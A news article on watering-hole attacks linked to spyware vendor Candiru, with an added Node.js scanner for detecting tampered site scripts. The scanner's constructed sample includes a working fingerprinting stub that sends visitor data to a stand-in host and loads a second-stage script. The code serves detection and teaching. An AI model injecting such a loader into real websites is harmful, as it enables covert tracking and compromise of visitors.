
Why did Candiru get blacklisted by the US Government?

New evidence suggests that Israeli spyware vendor Candiru, which was recently added to the US government's economic blacklist, carried out "watering hole" attacks against high-profile targets in the UK and the Middle East.


The strategic web compromises are thought to have happened in two waves, the first beginning in March 2020 and ending in August 2020, and the second beginning in January 2021 and ending in early August 2021, when the malicious scripts were removed from the targeted domains.

Watering hole attacks are a type of highly targeted intrusion in which a specific group of end users is infected by compromising websites that the group is known to visit, with the aim of gaining access to their computers for further exploitation.

In the first wave, JavaScript injected into the compromised sites loaded a script from a remote attacker-controlled domain. That script collected and exfiltrated IP geolocation and system information about the visiting machine, but only proceeded if the operating system was Windows or macOS, indicating that the campaign targeted desktop computers rather than mobile devices. The final stage is believed to have been a browser remote code execution exploit, giving the attackers control of the victim's computer.

The second wave, which began in January 2021, was stealthier: rather than being added directly to the main HTML page, the malicious code was embedded in a genuine WordPress script ("wp-embed.min.js"), using that mechanism to load a further script from a server under the attacker's control. The fingerprinting script also grew more thorough, capturing the default language, the list of fonts supported by the browser, the time zone and the list of browser plugins in addition to system metadata.
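The two chains described above (a fingerprinting script that gates on the OS and then pulls a second stage from a remote host, the second time hidden inside a legitimate WordPress file) lend themselves to a simple content and integrity check over the JavaScript a site actually serves. The Node.js scanner below is an added example written for this article; it is not ESET's tooling and nothing in it was recovered from the campaign. The file bodies, the site host `example.org` and the loader domain `cdn.update-check.invalid` are constructed for illustration. It flags script loads from hosts outside an allowlist, counts browser-fingerprinting API calls of the kind the report describes (platform, language, time zone, plugins, fonts), and isolates any bytes added around a file that should match a pristine vendor copy, which is how a tampered `wp-embed.min.js` shows up.

```javascript
// Added example, not code from the page or from the campaign it describes.
// All hostnames and file contents below are constructed for illustration.

const SITE_HOST = 'example.org';                                    // assumed site being audited
const ALLOWED_HOSTS = new Set([SITE_HOST, 'www.' + SITE_HOST]);     // hosts scripts may legitimately load from

// Matches `src="https://..."`, `x.src="//..."` and `src: "https://..."` in HTML or JS.
const REMOTE_SRC_RE = /\bsrc\s*[=:]\s*["'`]((?:https?:)?\/\/[^"'`\s]+)["'`]/gi;

// Browser APIs typically combined by fingerprinting scripts (one category per entry).
const FINGERPRINT_INDICATORS = {
  platform: /navigator\.(?:platform|userAgent|appVersion)/,
  language: /navigator\.languages?\b/,
  timezone: /getTimezoneOffset\(|resolvedOptions\(\)\.timeZone/,
  plugins:  /navigator\.plugins/,
  fonts:    /document\.fonts|offsetWidth/,   // font checks via FontFaceSet or text-width probing
};

// Scan one served file: collect remote loads, classify them against the allowlist,
// and count which fingerprinting categories appear. A file is suspicious if it loads
// from an unapproved host or touches three or more fingerprint categories.
function scanScript(name, body) {
  const remoteLoads = [];
  for (const m of body.matchAll(REMOTE_SRC_RE)) {
    let host;
    try { host = new URL(m[1], 'https://' + SITE_HOST + '/').hostname; } catch (e) { continue; }
    remoteLoads.push({ url: m[1], host, external: !ALLOWED_HOSTS.has(host) });
  }
  const fingerprintHits = Object.entries(FINGERPRINT_INDICATORS)
    .filter(([, re]) => re.test(body))
    .map(([category]) => category);
  const externalLoads = remoteLoads.filter((r) => r.external);
  return {
    name, remoteLoads, externalLoads, fingerprintHits,
    suspicious: externalLoads.length > 0 || fingerprintHits.length >= 3,
  };
}

// Compare a served file with the pristine vendor copy. Injected code appended or
// prepended to an otherwise intact file is returned as prefix/suffix so it can be
// reviewed; an in-place edit leaves no intact copy and is reported as a full mismatch.
function diffAgainstPristine(pristine, actual) {
  if (actual === pristine) return { modified: false, prefix: '', suffix: '' };
  const i = actual.indexOf(pristine);
  if (i < 0) return { modified: true, prefix: null, suffix: null };   // edited inside the body
  return { modified: true, prefix: actual.slice(0, i), suffix: actual.slice(i + pristine.length) };
}

// Constructed samples: a stand-in for a pristine wp-embed.min.js, and the same file
// with a fingerprint-and-load stub appended that only fires on Windows or macOS.
const PRISTINE_WP_EMBED =
  '!function(e,t){"use strict";var r=!1,n=!1;e.wp=e.wp||{},' +
  'e.wp.receiveEmbedMessage=function(){}}(window,document);';
const INJECTED_TAIL =
  '(function(){var p=navigator.platform,l=navigator.language,' +
  'z=new Date().getTimezoneOffset(),' +
  'g=[].slice.call(navigator.plugins).map(function(x){return x.name}),' +
  'f=document.fonts&&document.fonts.check("12px Tahoma");' +
  'if(/Win|Mac/.test(p)){var s=document.createElement("script");' +
  's.src="https://cdn.update-check.invalid/stage2.js?p="+' +
  'encodeURIComponent([p,l,z,f,g.join(",")].join("|"));' +
  'document.head.appendChild(s);}})();';
const MODIFIED_WP_EMBED = PRISTINE_WP_EMBED + INJECTED_TAIL;

function report() {
  const scan = scanScript('wp-embed.min.js', MODIFIED_WP_EMBED);
  const diff = diffAgainstPristine(PRISTINE_WP_EMBED, MODIFIED_WP_EMBED);
  return { scan, diff };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(report(), null, 2));
}
```

In practice you would feed `scanScript` every script the site serves (fetched as a visitor would see it, not read from disk, since the injection can happen at the edge) and `diffAgainstPristine` every file that should match a known vendor release; the fingerprint heuristic is deliberately loose and exists to prioritise review, not to replace it.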


The specific exploit and payload sent have yet to be determined. “This demonstrates that the operators have chosen to focus their operations and do not want to burn their zero-day exploits,” stated ESET malware researcher Matthieu Faou.

The campaign's links to Candiru rest on the fact that some of the attackers' command-and-control servers overlap with domains previously attributed to the Israeli firm, and on the use of browser-based remote code execution exploits, raising the possibility that "the operators of the watering holes are Candiru customers."

Nidhi Khandelwal

Nidhi is a tech news/research contributor at TheDigitalHacker. She writes about techno-geopolitics, privacy, and data breaches.